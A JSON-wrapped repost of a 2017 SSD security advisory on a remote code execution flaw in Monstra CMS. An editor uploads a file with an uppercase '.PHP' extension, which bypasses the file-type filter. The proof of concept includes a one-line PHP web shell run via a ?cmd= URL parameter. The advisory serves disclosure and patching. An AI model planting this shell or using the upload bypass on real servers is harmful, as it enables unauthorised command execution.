{"id":10741,"date":"2017-12-06T14:19:18","date_gmt":"2017-12-06T22:19:18","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/12\/06\/news-4513\/"},"modified":"2017-12-06T14:19:18","modified_gmt":"2017-12-06T22:19:18","slug":"news-4513","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/12\/06\/news-4513\/","title":{"rendered":"SSD Advisory \u2013 Monstra CMS RCE"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Wed, 06 Dec 2017 06:35:44 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3559\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3559');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes a vulnerability found in Monstra CMS.<\/p>\n<p>Monstra is &#8220;a modern and lightweight Content Management System. It is Easy to install, upgrade and use.&#8221;<\/p>\n<p>The vulnerability found is a remote code execution vulnerability through an arbitrary file upload mechanism.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Ishaq Mohammed, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> We were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support &#8211; though this is not an official status on their site (last official patch was released on 2012-11-29), the github appears a bit more active (last commit from 2 years ago).<\/p>\n<p>Without any vendor response the researcher was kind enough to create a patch that addresses this bug, its available here: https:\/\/github.com\/monstra-cms\/monstra\/issues\/426<\/p>\n<p><strong>Vulnerabilities details<\/strong><br \/> An editor can upload files to the Monstra CMS and can access them by clicking on them from the administrator portal. The default setup of Monstra CMS allows uploading of files only with certain extensions, forbidding all types of executable files which are mentioned in <em>monstrapluginsboxfilesmanagerfilesmanager.admin.php<\/em>. However by simply uploading a php file with \u201cPHP\u201d (all characters in uppercase) extension will bypass this mechanism and will allow an attacker to execute shell commands on the server.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Steps to Reproduce:<\/p>\n<ol>\n<li>Login with a valid credentials of an Editor<\/li>\n<li>Select Files option from the Dropdown menu of Content<\/li>\n<li>Upload a file with PHP (uppercase)extenstion contaiing the below code:\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a286ce606b43138903763\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">PHP<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \t&lt;?php  \t\t$cmd=$_GET[&#8216;cmd&#8217;];  \t\tsystem($cmd);  \t?&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<\/li>\n<li>Click on Upload<\/li>\n<p>liOnce the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc.<\/ol>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3559\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Wed, 06 Dec 2017 06:35:44 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes a vulnerability found in Monstra CMS. Monstra is &#8220;a modern and lightweight Content Management System. It is Easy to install, upgrade and use.&#8221; The vulnerability found is a remote code execution vulnerability through an arbitrary file upload mechanism. Credit An independent security researcher, Ishaq Mohammed, has reported this vulnerability &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3559\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Monstra CMS RCE<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757],"class_list":["post-10741","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10741","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10741"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10741\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10741"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10741"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10741"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}